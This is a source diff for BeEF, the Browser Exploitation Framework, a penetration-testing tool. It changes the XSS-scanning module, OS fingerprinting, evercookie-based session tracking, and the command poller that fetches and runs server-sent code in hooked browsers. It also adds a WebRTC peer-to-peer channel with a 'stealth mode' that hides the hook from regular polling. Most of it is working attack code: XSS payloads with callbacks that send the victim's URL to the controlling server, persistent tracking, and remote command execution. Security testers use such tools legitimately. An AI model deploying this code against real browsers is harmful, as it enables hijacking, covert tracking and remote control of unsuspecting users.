                for (var i in params) {
                    if (params.hasOwnProperty(i)) {

@@ -323,17 +338,24 @@ beef.net.xssrays = {
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;

-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";

                        exploit = vector.input.replace(/XSS/g, beefCallback);

-                        url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
+                        if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
+                            url += i + '=' + exploit + '&';
+                        }else{
+                            url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
+                        }

                        paramsPos++;
                    }
                }
-            } else {  // check for XSS in GET URL path
+            } else {
+                /*
+                 * ++++++++++ check for XSS in URI path (GET) ++++++++++
+                 */
                var filename = beef.net.xssrays.fileName(url);

                poc = vector.input.replace(/XSS/g, "alert(1)");
@@ -344,7 +366,7 @@ beef.net.xssrays = {
                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;

                beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";

                exploit = vector.input.replace(/XSS/g, beefCallback);

@@ -352,19 +374,37 @@ beef.net.xssrays = {
                //TODO: this need to checked and the slash shouldn't be added in this particular case
                url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
            }
-
-
-            var iframe = document.createElement('iframe');
+            /*
+             * ++++++++++ create the iFrame that will contain the attack vector ++++++++++
+             */
+            if(beef.browser.isIE()){
+                try {
+                    var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
+                } catch (e) {
+                    var iframe = document.createElement('iframe');
+                    iframe.name = 'ray' + Math.random().toString();
+                }
+            }else{
+                var iframe = document.createElement('iframe');
+                iframe.name = 'ray' + Math.random().toString();
+            }
            iframe.style.display = 'none';
            iframe.id = 'ray' + beef.net.xssrays.uniqueID;
            iframe.time = beef.net.xssrays.timestamp();
-            iframe.name = 'ray' + Math.random().toString();

            if (method === 'GET') {
-                iframe.src = url;
+                if(beef.browser.isC() || beef.browser.isS()){
+                    var datauri = btoa(url);
+                    iframe.src = "data:text/html;base64," + datauri;
+                }else{
+                    iframe.src = url;
+                }
                document.body.appendChild(iframe);
                beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
            } else if (method === 'POST') {
+                /*
+                 * ++++++++++ check for XSS in body parameters (POST) ++++++++++
+                 */
                var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
                poc = '';
                pocurl = action + "?";
@@ -382,7 +422,7 @@ beef.net.xssrays = {
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;

                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";

                        exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                        form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
@@ -414,11 +454,13 @@ beef.net.xssrays = {
                numOfConnections++;
                //beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
                if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
-                    if (iframe) {
-                        beef.net.xssrays.complete();
-                        beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
-                        document.body.removeChild(iframe);
-                    }
+                    try{
+                        if (iframe) {
+                            beef.net.xssrays.complete();
+                            beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
+                            document.body.removeChild(iframe);
+                        }
+                    }catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
                }
            }

--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,24 +1,37 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.os = {

 	ua: navigator.userAgent,
-	
+
+	/**
+	  * Detect default browser (IE only)
+	  * Written by unsticky
+	  * http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
+	  */
+	getDefaultBrowser: function() {
+		var result = "Unknown"
+		try {
+			var mt = document.mimeType;
+			if (mt) {
+				if (mt == "Safari Document")       result = "Safari";
+				if (mt == "Firefox HTML Document") result = "Firefox";
+				if (mt == "Chrome HTML Document")  result = "Chrome";
+				if (mt == "HTML Document")         result = "Internet Explorer";
+				if (mt == "Opera Web Document")    result = "Opera";
+			}
+		} catch (e) {
+			beef.debug("[os] getDefaultBrowser: "+e.message);
+		}
+		return result;
+	},
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -28,18 +41,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
+	isWinCE: function() {
+		return (this.ua.match('(Windows CE)')) ? true : false;
+	},
 	
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
+
+	isWin2000SP1: function() {
+		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
+	},
 	
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -56,6 +76,14 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+
+	isWin8: function() {
+		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},	
+	
+	isWin81: function() {
+		return (this.ua.match('(Windows NT 6.3)')) ? true : false;
+	},
 	
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -72,7 +100,11 @@ beef.os = {
 	isMacintosh: function() {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},
-	
+
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -97,6 +129,10 @@ beef.os = {
 		return (this.ua.match('BlackBerry')) ? true : false;
 	},

+	isWebOS: function() {
+		return (this.ua.match('webOS')) ? true : false;
+	},
+
 	isQNX: function() {
 		return (this.ua.match('QNX')) ? true : false;
 	},
@@ -104,19 +140,27 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
+
+	isWindows: function() {
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWin81() || this.isWinPhone();
+	},
 	
 	getName: function() {
-		//windows
-		if(this.isWin311()) return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
-		if(this.isWin98()) return 'Windows 98';
-		if(this.isWinME()) return 'Windows Millenium';
-		if(this.isWin2000()) return 'Windows 2000';
-		if(this.isWinXP()) return 'Windows XP';
+		//Windows
+		if(this.isWin311())        return 'Windows 3.11';
+		if(this.isWinNT4())        return 'Windows NT 4';
+		if(this.isWinCE())         return 'Windows CE';
+		if(this.isWin95())         return 'Windows 95';
+		if(this.isWin98())         return 'Windows 98';
+		if(this.isWinME())         return 'Windows Millenium';
+		if(this.isWin2000())       return 'Windows 2000';
+		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
+		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
+		if(this.isWinVista())      return 'Windows Vista';
+		if(this.isWin7())          return 'Windows 7';
+		if(this.isWin8())          return 'Windows 8';
+		if(this.isWin81())         return 'Windows 8.1';

 		//Nokia
 		if(this.isNokia()) {
@@ -139,11 +183,14 @@ beef.os = {
 		if(this.isSunOS()) return 'Sun OS';

 		//iPhone
-		if (this.isIphone()) return 'iPhone';
+		if (this.isIphone()) return 'iOS';
 		//iPad
-		if (this.isIpad()) return 'iPad';
+		if (this.isIpad()) return 'iOS';
 		//iPod
-		if (this.isIpod()) return 'iPod';
+		if (this.isIpod()) return 'iOS';
+
+		// zune
+		//if (this.isZune()) return 'Zune';
 		
 		//macintosh
 		if(this.isMacintosh()) {
@@ -156,6 +203,7 @@ beef.os = {
 		//others
 		if(this.isQNX()) return 'QNX';
 		if(this.isBeOS()) return 'BeOS';
+		if(this.isWebOS()) return 'webOS';
 		
 		return 'unknown';
 	}
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.session
 *
@@ -22,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -31,12 +23,12 @@ beef.session = {
 	 */
  	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -56,9 +48,9 @@ beef.session = {
 	 */
  	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**
@@ -77,26 +69,7 @@ beef.session = {
 		}
 		
 		return hook_session_id;
-	},
-
-	/**
-	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
-	 */
-	persistant: function() {
-		$j('a').click(function(e) {
-			if ($j(this).attr('href') != '')
-			{
-				e.preventDefault();
-				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
-				$j(document).attr('title', $j(this).html());
-				document.body.scroll = "no";
-				document.documentElement.style.overflow = 'hidden';
-			}
-		});
 	}
-	
-
-				
 };

 beef.regCmp('beef.session');
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ Sometimes there are timing issues and looks like beef_init
+ is not called at all (always in cross-origin situations,
+ for example calling the hook with jquery getScript,
+ or sometimes with event handler injections).
+
+ To fix this, we call again beef_init after 1 second.
+ Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
+ antisnatchor
+ */
+setTimeout(beef_init, 1000);
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,29 +1,21 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @Literal object: beef.updater
 *
 * Object in charge of getting new commands from the BeEF framework and execute them.
+ * The XHR-polling channel is managed here. If WebSockets are enabled,
+ * websocket.ls is used instead.
 */
 beef.updater = {
 	
-	// Low timeouts combined with the way the framework sends commamd modules result 
-	// in instructions being sent repeatedly or complex code. 
-	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 1000,
+	// XHR-polling timeout.
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -51,18 +43,21 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			} else {
-				this.get_commands();
+			}else {
+				this.get_commands();    /*Polling*/
 			}
 		}
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+        /* The following gives a stupid syntax error in IE, which can be ignored*/
+        setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
 	},
 	
-	// Gets new commands from the framework.
-	get_commands: function(http_response) {
+    /**
+     * Gets new commands from the framework.
+     */
+	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                if (response.body != null && response.body.length > 0)
                    beef.updater.execute_commands();
            });
@@ -73,23 +68,25 @@ beef.updater = {
 		this.lock = false;
 	},
 	
-	// Executes the received commands if any.
+    /**
+     * Executes the received commands, if any.
+     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
-		
 		this.lock = true;
-		
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
 				command();
 			} catch(e) {
-				console.error('execute_commands - command failed to execute: ' + e.message);
+				beef.debug('execute_commands - command failed to execute: ' + e.message);
+                // prints the command source to be executed, to better trace errors
+                // beef.client_debug must be enabled in the main config
+                beef.debug(command.toString());
 			}
 		}
-		
 		this.lock = false;
 	}
-}
+};

 beef.regCmp('beef.updater');
--- a/core/main/client/webrtc.js
+++ b/core/main/client/webrtc.js
@@ -0,0 +1,588 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+/**
+ * @Literal object: beef.webrtc
+ *
+ * Manage the WebRTC peer to peer communication channels.
+ * This objects contains all the necessary client-side WebRTC components,
+ * allowing browsers to use WebRTC to communicate with each other.
+ * To provide signaling, the WebRTC extension sets up custom listeners.
+ *  /rtcsignal - for sending RTC signalling information between peers
+ *  /rtcmessage - for client-side rtc messages to be submitted back into beef and logged.
+ *
+ * To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
+ * the signalling.
+ *
+ * This is all mostly a Proof of Concept
+ */
+
+beefrtcs = {}; // To handle multiple peers - we need to have a hash of Beefwebrtc objects
+               // The key is the peer id
+globalrtc = {}; // To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
+                // these objects persist outside of everything else 
+                // The key is the peer id
+rtcstealth = false; // stealth should only be initiated from one peer - this global variable will contain:
+                    // false - i.e not stealthed; or
+                    // <peerid> - i.e. the id of the browser which initiated stealth mode
+rtcrecvchan = {}; // To handle multiple event channels - we need to have a global hash of these
+                  // The key is the peer id
+
+// Beefwebrtc object - wraps everything together for a peer connection
+// One of these per peer connection, and will be stored in the beefrtc global hash
+function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
+    this.verbose = typeof verbparam !== 'undefined' ? verbparam : false; // whether this object is verbose or not
+    this.initiator = typeof initiator !== 'undefined' ? initiator : 0; // if 1 - this is the caller; if 0 - this is the receiver
+    this.peerid = typeof peer !== 'undefined' ? peer : null; // id of this rtc peer
+    this.turnjson = turnjson; // set of TURN servers in the format:
+                              // {"username": "<username", "password": "<password>", "uris": [
+                              //    "turn:<ip>:<port>?transport=<udp/tcp>",
+                              //    "turn:<ip>:<port>?transport=<udp/tcp>"]}
+    this.started = false; // Has signaling / dialing started for this peer
+    this.gotanswer = false; // For the caller - this determines whether they have received an SDP answer from the receiver
+    this.turnDone = false; // does the pcConfig have TURN servers added to it?
+    this.signalingReady = false; // the initiator (Caller) is always ready to signal. So this sets to true during init
+                                 // the receiver will set this to true once it receives an SDP 'offer'
+    this.msgQueue = []; // because the handling of SDP signals may happen in any order - we need a queue for them
+    this.pcConfig = null; // We set this during init
+    this.pcConstraints = {"optional": [{"googImprovedWifiBwe": true}]} // PeerConnection constraints
+    this.offerConstraints = {"optional": [], "mandatory": {}}; // Default SDP Offer Constraints - used in the caller
+    this.sdpConstraints = {'optional': [{'RtpDataChannels':true}]}; // Default SDP Constraints - used by caller and receiver
+    this.gatheredIceCandidateTypes = { Local: {}, Remote: {} }; // ICE Candidates
+    this.allgood = false; // Is this object / peer connection with the nominated peer ready to go?
+    this.dataChannel = null; // The data channel used by this peer
+    this.stunservers = stunservers; // set of STUN servers, in the format:
+                                    // ["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302"]
+}
+
+// Initialize the object
+Beefwebrtc.prototype.initialize = function() {
+  if (this.peerid == null) {
+    return 0; // no peerid - NO DICE
+  }
+
+  // Initialise the pcConfig hash with the provided stunservers
+  var stuns = JSON.parse(this.stunservers);
+  this.pcConfig = {"iceServers": [{"urls":stuns}]};
+
+  // We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
+  this.forceTurn(this.turnjson);
+
+  // Caller is always ready to create peerConnection.
+  this.signalingReady = this.initiator;
+
+  // Start .. maybe 
+  this.maybeStart();
+
+  // If the window is closed, send a signal to beef .. this is not all that great, so just commenting out
+  // window.onbeforeunload = function() {
+  //   this.sendSignalMsg({type: 'bye'});
+  // }
+
+  return 1; // because .. yeah .. we had a peerid - this is good yar.
+}
+
+//Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
+//These values are now simply passed in from the config.yaml for the webrtc extension
+Beefwebrtc.prototype.forceTurn = function(jason) {
+    var turnServer = JSON.parse(jason);
+    var iceServers = createIceServers(turnServer.uris,
+                                      turnServer.username,
+                                      turnServer.password);
+    if (iceServers !== null) {
+        this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
+    }
+    if (this.verbose) {console.log("Got TURN servers, will try and maybestart again..");}
+    this.turnDone = true;
+    this.maybeStart();
+}
+
+// Try and establish the RTC connection
+Beefwebrtc.prototype.createPeerConnection = function() {
+  if (this.verbose) {
+      console.log('Creating RTCPeerConnnection with the following options:\n' +
+                '  config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
+                '  constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
+    }
+  try {
+    // Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
+    globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
+    globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
+    if (this.verbose) {
+      console.log('Created RTCPeerConnnection with the following options:\n' +
+                '  config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
+                '  constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
+    }
+  } catch (e) {
+    if (this.verbose) {
+      console.log('Failed to create PeerConnection, exception: ');
+      console.log(e);
+    }
+    return;
+  }
+
+  // Assign event handlers to signalstatechange, iceconnectionstatechange, datachannel etc
+  globalrtc[this.peerid].onsignalingstatechange = this.onSignalingStateChanged;
+  globalrtc[this.peerid].oniceconnectionstatechange = this.onIceConnectionStateChanged;
+  globalrtc[this.peerid].ondatachannel = this.onDataChannel;
+  this.dataChannel = globalrtc[this.peerid].createDataChannel("sendDataChannel", {reliable:false});
+}
+
+// When the PeerConnection receives a new ICE Candidate
+Beefwebrtc.prototype.onIceCandidate = function(event) {
+  var peerid = null;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].allgood === false) {
+      peerid = beefrtcs[k].peerid;
+    }
+  }
+
+  if (beefrtcs[peerid].verbose) {
+    console.log("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
+    console.log(event);
+  }
+
+  if (event.candidate) {
+    // Send the candidate to the peer via the BeEF signalling channel
+    beefrtcs[peerid].sendSignalMsg({type: 'candidate',
+                 label: event.candidate.sdpMLineIndex,
+                 id: event.candidate.sdpMid,
+                 candidate: event.candidate.candidate});
+    // Note this ICE candidate locally
+    beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
+  } else {
+    if (beefrtcs[peerid].verbose) {console.log('End of candidates.');}
+  }
+}
+
+// For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
+// This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
+// against the message directly
+Beefwebrtc.prototype.processMessage = function(message) {
+  if (this.verbose) {
+    console.log('Signalling Message - S->C: ' + JSON.stringify(message));
+  }
+  var msg = JSON.parse(message);
+
+  if (!this.initiator && !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
+    if (this.verbose) {console.log('processing the message, as a receiver');}
+    if (msg.type === 'offer') { // This IS an SDP Offer
+      if (this.verbose) {console.log('.. and the message is an offer .. ');}
+      this.msgQueue.unshift(msg); // put it on the top of the msgqueue
+      this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
+      this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
+    } else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
+      if (this.verbose) {console.log(' .. the message is NOT an offer .. ');}
+      this.msgQueue.push(msg);
+    }
+  } else if (this.initiator && !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
+    if (this.verbose) {console.log('processing the message, as the sender, no answers yet');}
+    if (msg.type === 'answer') { // This IS an SDP Answer
+        if (this.verbose) {console.log('.. and we have an answer ..');}
+        this.processSignalingMessage(msg); // Process the message directly
+        this.gotanswer = true; // We have now received an answer
+        //process all other queued message...
+        while (this.msgQueue.length > 0) {
+            this.processSignalingMessage(this.msgQueue.shift());
+        }
+    } else { // This is NOT an SDP Answer - as the caller, just add it to the queue
+        if (this.verbose) {console.log('.. not an answer ..');}
+        this.msgQueue.push(msg);
+    }
+  } else { // For all other messages just drop them in the queue
+    if (this.verbose) {console.log('processing a message, but, not as a receiver, OR, the rtc is already up');}
+    this.processSignalingMessage(msg);
+  } 
+}
+
+// Send a signalling message .. 
+Beefwebrtc.prototype.sendSignalMsg = function(message) {
+  var msgString = JSON.stringify(message);
+  if (this.verbose) {console.log('Signalling Message - C->S: ' + msgString);}
+  beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
+}
+
+// Used to record ICS candidates locally
+Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
+  if (this.gatheredIceCandidateTypes[location][type])
+    return;
+  this.gatheredIceCandidateTypes[location][type] = 1;
+  // updateInfoDiv();
+}
+
+// When the signalling state changes. We don't actually do anything with this except log it.
+Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+
+  if (localverbose === true) {console.log("Signalling has changed to: " + event.target.signalingState);}
+}
+
+// When the ICE Connection State changes - this is useful to determine connection statuses with peers.
+Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
+  var peerid = null;
+
+  for (k in globalrtc) {
+    if ((globalrtc[k].localDescription.sdp === event.target.localDescription.sdp) && (globalrtc[k].localDescription.type === event.target.localDescription.type)) {
+      peerid = k;
+    }
+  }
+
+  if (beefrtcs[peerid].verbose) {console.log("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);}
+
+  // ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for 
+  // better candidates or connections
+  if (event.target.iceConnectionState === 'connected') {
+    //Send status to peer
+    window.setTimeout(function() {
+        beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
+        beefrtcs[peerid].allgood = true;
+        },1000);
+  }
+
+  // Completed is similar to connected. Except, each of the ICE components are good, and no more testing remote candidates is done.
+  if (event.target.iceConnectionState === 'completed') {
+    window.setTimeout(function() {
+      beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
+      beefrtcs[peerid].allgood = true;
+    },1000);
+  }
+
+  if ((rtcstealth == peerid) && (event.target.iceConnectionState === 'disconnected')) {
+    //I was in stealth mode, talking back to this peer - but it's gone offline.. come out of stealth
+    rtcstealth = false;
+    beefrtcs[peerid].allgood = false;
+    beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
+  } else if ((rtcstealth == false) && (event.target.iceConnectionState === 'disconnected')) {
+    //I was not in stealth, and this peer has gone offline - send a message
+    beefrtcs[peerid].allgood = false;
+    beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
+  }
+  // We don't handle situations where a stealthed peer loses a peer that is NOT the peer that made it go into stealth
+  // This is possibly a bad idea - @xntrik
+
+
+}
+
+// This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"
+Beefwebrtc.prototype.goStealth = function() {
+    //stop the beef updater
+    rtcstealth = this.peerid; // this is a global variable
+    beef.updater.lock = true;
+    this.sendPeerMsg('Going into stealth mode');
+
+    setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 3);
+}
+
+// This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
+rtcpollPeer = function() {
+    if (rtcstealth == false) {
+        //my peer has disabled stealth mode
+        beef.updater.lock = false;
+        return;
+    }
+
+    if (beefrtcs[rtcstealth].verbose) {console.log('lub dub');}
+
+    beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
+
+    setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 3);
+}
+
+// When a data channel has been established - within here is the message handling function as well
+Beefwebrtc.prototype.onDataChannel = function(event) {
+  var peerid = null;
+  for (k in globalrtc) {
+    if ((globalrtc[k].localDescription.sdp === event.currentTarget.localDescription.sdp) && (globalrtc[k].localDescription.type === event.currentTarget.localDescription.type)) {
+      peerid = k;
+    }
+  }
+
+  if (beefrtcs[peerid].verbose) {console.log("Peer: " + peerid + " has just handled the onDataChannel event");}
+  rtcrecvchan[peerid] = event.channel;
+
+  // This is the onmessage event handling within the datachannel
+  rtcrecvchan[peerid].onmessage = function(ev2) {
+    if (beefrtcs[peerid].verbose) {console.log("Received an RTC message from my peer["+peerid+"]: " + ev2.data);}
+
+    // We've received the command to go into stealth mode
+    if (ev2.data == "!gostealth") {
+        if (beef.updater.lock == true) {
